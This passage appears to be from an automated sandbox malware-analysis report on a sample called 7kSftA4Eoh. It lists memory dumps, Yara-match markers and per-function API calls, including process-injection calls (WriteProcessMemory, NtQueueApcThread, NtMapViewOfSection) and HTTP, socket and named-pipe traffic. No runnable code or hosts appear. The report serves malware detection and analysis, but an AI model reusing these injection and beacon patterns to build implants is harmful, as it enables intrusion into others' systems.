                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: acceptioctlsocket$closesockethtonlselect
                                                                  • String ID:
                                                                  • API String ID: 2003300010-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: strtok$malloc$_time64$ErrorFreeHeapLast_errno_getptdfree
                                                                  • String ID:
                                                                  • API String ID: 620445413-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$CountNamedPipeTick$Handle$CloseCreateDisconnectFileSleepStateWait
                                                                  • String ID:
                                                                  • API String ID: 832653698-0
                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 0099E971
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • _snprintf.LIBCMT ref: 0099E98D
                                                                  • _snprintf.LIBCMT ref: 0099EA03
                                                                  • _snprintf.LIBCMT ref: 0099EA1A
                                                                    • Part of subcall function 009AB5DC: _flsbuf.LIBCMT ref: 009AB67D
                                                                  • HttpOpenRequestA.WININET ref: 0099EA66
                                                                  • HttpSendRequestA.WININET ref: 0099EA99
                                                                  • InternetCloseHandle.WININET ref: 0099EAAE
                                                                  • Sleep.KERNEL32 ref: 0099EAB9
                                                                  • InternetCloseHandle.WININET ref: 0099EACC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep_errno_flsbuf_invalid_parameter_noinfo
                                                                  • String ID: %s%s$*/*
                                                                  • API String ID: 3364845851-856325523
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32 ref: 009A23A6
                                                                  • GetProcAddress.KERNEL32 ref: 009A23B6
                                                                    • Part of subcall function 009A2258: malloc.LIBCMT ref: 009A2296
                                                                    • Part of subcall function 009A2258: VirtualAllocEx.KERNEL32 ref: 009A22E1
                                                                    • Part of subcall function 009A2258: WriteProcessMemory.KERNEL32 ref: 009A2305
                                                                    • Part of subcall function 009A2258: free.LIBCMT ref: 009A231B
                                                                  • OpenThread.KERNEL32 ref: 009A2420
                                                                  • CloseHandle.KERNEL32 ref: 009A2447
                                                                  • Thread32Next.KERNEL32 ref: 009A2454
                                                                  • CloseHandle.KERNEL32 ref: 009A2460
                                                                  • Sleep.KERNEL32 ref: 009A246B
                                                                  • ReadProcessMemory.KERNEL32 ref: 009A248C
                                                                  • WriteProcessMemory.KERNEL32 ref: 009A24BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: HandleMemoryProcess$CloseWrite$AddressAllocModuleNextOpenProcReadSleepThreadThread32Virtualfreemalloc
                                                                  • String ID: NtQueueApcThread$ntdll
                                                                  • API String ID: 2809487561-1374908105
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009ABDD6
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009ABDE2
                                                                  • __crtIsPackagedApp.LIBCMT ref: 009ABDF3
                                                                  • AreFileApisANSI.KERNEL32 ref: 009ABE02
                                                                  • MultiByteToWideChar.KERNEL32 ref: 009ABE28
                                                                  • GetLastError.KERNEL32 ref: 009ABE35
                                                                  • _dosmaperr.LIBCMT ref: 009ABE3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1138158220-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                  • String ID:
                                                                  • API String ID: 4099253644-0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                                                  • String ID: d
                                                                  • API String ID: 1257931466-2564639436
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03562035
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 0356202C
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __doserrno.LIBCMT ref: 03562092
                                                                  • _errno.LIBCMT ref: 03562099
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 035620FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 388111225-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: HandleProcess$CurrentDuplicate$ErrorLast$AttributeCloseOpenProcThreadUpdate
                                                                  • String ID:
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CountErrorLastSleepTickWrite$BuffersCloseDisconnectFlushHandleNamedPipe
                                                                  • String ID:
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$HandleView$AddressCloseCreateErrorLastMappingModuleProcUnmap
                                                                  • String ID: NtMapViewOfSection$ntdll.dll
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$ErrorLastSleepselectsend
                                                                  • String ID: d
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03562E1A
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 03562E12
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __lock_fhandle.LIBCMT ref: 03562E5E
                                                                  • _lseeki64_nolock.LIBCMT ref: 03562E77
                                                                  • _unlock_fhandle.LIBCMT ref: 03562E9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                                                  • String ID:
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03562CA2
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 03562C9A
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __lock_fhandle.LIBCMT ref: 03562CE6
                                                                  • _lseek_nolock.LIBCMT ref: 03562CFF
                                                                  • _unlock_fhandle.LIBCMT ref: 03562D20
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                                                                  • String ID:
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B2BEE
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B2BE5
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __doserrno.LIBCMT ref: 009B2C4B
                                                                  • _errno.LIBCMT ref: 009B2C52
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009B2CB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  APIs
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009BBC76
                                                                  • _errno.LIBCMT ref: 009BBC6B
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$Memory$ErrorLastRead$ContextCurrentProtectThreadVirtualWritefreemalloc
                                                                  • String ID:
                                                                  APIs
                                                                    • Part of subcall function 009AC204: _mtinitlocknum.LIBCMT ref: 009AFB4A
                                                                    • Part of subcall function 009AC204: _amsg_exit.LIBCMT ref: 009AFB56
                                                                  • DecodePointer.KERNEL32 ref: 009AC278
                                                                  • DecodePointer.KERNEL32 ref: 009AC296
                                                                  • EncodePointer.KERNEL32 ref: 009AC2C4
                                                                  • DecodePointer.KERNEL32 ref: 009AC2D9
                                                                  • EncodePointer.KERNEL32 ref: 009AC2E4
                                                                  • DecodePointer.KERNEL32 ref: 009AC2F6
                                                                  • DecodePointer.KERNEL32 ref: 009AC306
                                                                  • __crtCorExitProcess.LIBCMT ref: 009AC38A
                                                                  • ExitProcess.KERNEL32 ref: 009AC392
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                                                                  • String ID:
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htons$ErrorLastStartupclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                                                  • String ID:
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03561646
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 0356163E
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __lock_fhandle.LIBCMT ref: 0356168A
                                                                  • _unlock_fhandle.LIBCMT ref: 035616C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                                                                  • String ID:
                                                                  APIs
                                                                    • Part of subcall function 009A5248: htonl.WS2_32 ref: 009A52A5
                                                                    • Part of subcall function 009A5248: select.WS2_32 ref: 009A5313
                                                                    • Part of subcall function 009A5248: __WSAFDIsSet.WS2_32 ref: 009A532B
                                                                    • Part of subcall function 009A5248: accept.WS2_32 ref: 009A5348
                                                                    • Part of subcall function 009A5248: ioctlsocket.WS2_32 ref: 009A5360
                                                                    • Part of subcall function 009A5248: __WSAFDIsSet.WS2_32 ref: 009A5403
                                                                  • GetTickCount.KERNEL32 ref: 009A5212
                                                                    • Part of subcall function 009A5594: malloc.LIBCMT ref: 009A55C6
                                                                    • Part of subcall function 009A5594: htonl.WS2_32 ref: 009A55F9
                                                                    • Part of subcall function 009A5594: recvfrom.WS2_32 ref: 009A563D
                                                                    • Part of subcall function 009A5594: WSAGetLastError.WS2_32 ref: 009A564A
                                                                  • GetTickCount.KERNEL32 ref: 009A522A
                                                                  • GetTickCount.KERNEL32 ref: 009A5748
                                                                  • GetTickCount.KERNEL32 ref: 009A575E
                                                                  • shutdown.WS2_32 ref: 009A577D
                                                                  • shutdown.WS2_32 ref: 009A5792
                                                                  • closesocket.WS2_32 ref: 009A579C
                                                                  • free.LIBCMT ref: 009A57BC
                                                                  • free.LIBCMT ref: 009A57D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                                                                  • String ID:
                                                                  • API String ID: 3610715900-0
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03560E60
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 03560E58
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __lock_fhandle.LIBCMT ref: 03560EA4
                                                                  • _close_nolock.LIBCMT ref: 03560EB7
                                                                  • _unlock_fhandle.LIBCMT ref: 03560ED0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 2140805544-0
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B385B
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B3853
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __lock_fhandle.LIBCMT ref: 009B389F
                                                                  • _lseek_nolock.LIBCMT ref: 009B38B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                                  • String ID:
                                                                  • API String ID: 310312816-0
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B39D3
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B39CB
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __lock_fhandle.LIBCMT ref: 009B3A17
                                                                  • _lseeki64_nolock.LIBCMT ref: 009B3A30
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                                  • String ID:
                                                                  • API String ID: 4140391395-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno
                                                                  • String ID:
                                                                  • API String ID: 2288870239-0
                                                                  APIs
                                                                  Strings
                                                                  • Mingw-w64 runtime failure:, xrefs: 00401D88
                                                                  • Address %p has no image-section, xrefs: 00401DC0
                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                                                  • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: QueryVirtual
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                  • API String ID: 1804819252-1534286854
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B21FF
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B21F7
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __lock_fhandle.LIBCMT ref: 009B2243
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
